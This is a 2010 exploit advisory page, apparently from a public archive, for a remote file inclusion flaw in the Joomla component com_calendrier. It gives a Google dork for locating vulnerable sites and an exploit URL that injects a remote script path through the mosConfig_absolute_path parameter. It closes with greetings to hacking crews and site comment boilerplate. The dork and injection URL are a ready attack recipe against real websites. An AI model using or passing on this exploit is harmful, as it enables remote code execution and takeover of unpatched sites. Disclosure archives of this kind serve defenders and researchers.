The Joomla Calendrier component remote file inclusion vulnerability

2010.10.27

Credit: jos_ali_joe

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: com_calendrier

=========================================================
Joomla Component com_calendrier RFI Vulnerability
=========================================================
[+]Title : Joomla Component com_calendrier RFI Vulnerability
[+]Author : jos_ali_joe
[+]Contact : josalijoe@yahoo.com
[+]Home : http://josalijoe.wordpress.com/
########################################################################
Dork : inurl:index.php?option="com_calendrier"
########################################################################
[ Software Information ]
########################################################################
[+] Vendor : http://extensions.joomla.org/
[+] Archive : http://extensions.joomla.org/extensions/calendars-a-events
[+] version : Joomla 1.5
[+] Vulnerability : RFI
[+] Dork : com_calendrier
########################################################################
==========================================================================
RFI Exploit
Exploit : http://example.com/index.php?option=com_calendrier&Itemid=&mosConfig_absolute_path=[ packetstormsecurity ]
==========================================================================
####################################################################################
a little story from my
before thank you for the admin and staff packetstorm security
who already receive exploit archive from newbie jos_ali_joe
I do not have the kind of teacher or her
My teacher just google
and my brother who has been guiding me. N4ck0 - Aury - TeRRenJr - ArRay
I will create a spirit of looking for bugs / dork and submit the packetstorm security.
Thanks for packetstorm security \m/
####################################################################################
Thanks :
./kaMtiEz &#65533; ibl13Z &#65533; Xrobot &#65533; tukulesto &#65533; R3m1ck &#65533; jundab - asickboys- Vyc0d &#65533; Yur4kha - XPanda - eL Farhatz
./ArRay &#65533; akatsuchi &#65533; K4pt3N &#65533; Gameover &#65533; antitos &#65533; yuki &#65533; pokeng &#65533; ffadill - Alecs - v3n0m - RJ45
./Kiddies &#65533; pL4nkt0n &#65533; chaer newbie &#65533; andriecom &#65533; Abu_adam &#65533; Petimati - hakz &#65533; Virgi &#65533; Anharku - a17z a.k.a maho
./Me Family ATeN4 :
./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe
Greets For :
./Devilzc0de crew &#65533; Kebumen Cyber &#65533; Explore Crew &#65533; Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Wannabe Hacker
My Team : ./Indonesian Coder
Special Thanks To :
/. Admin and Staff packetstorm security

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The Joomla Calendrier component remote file inclusion vulnerability

Dork: com_calendrier

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.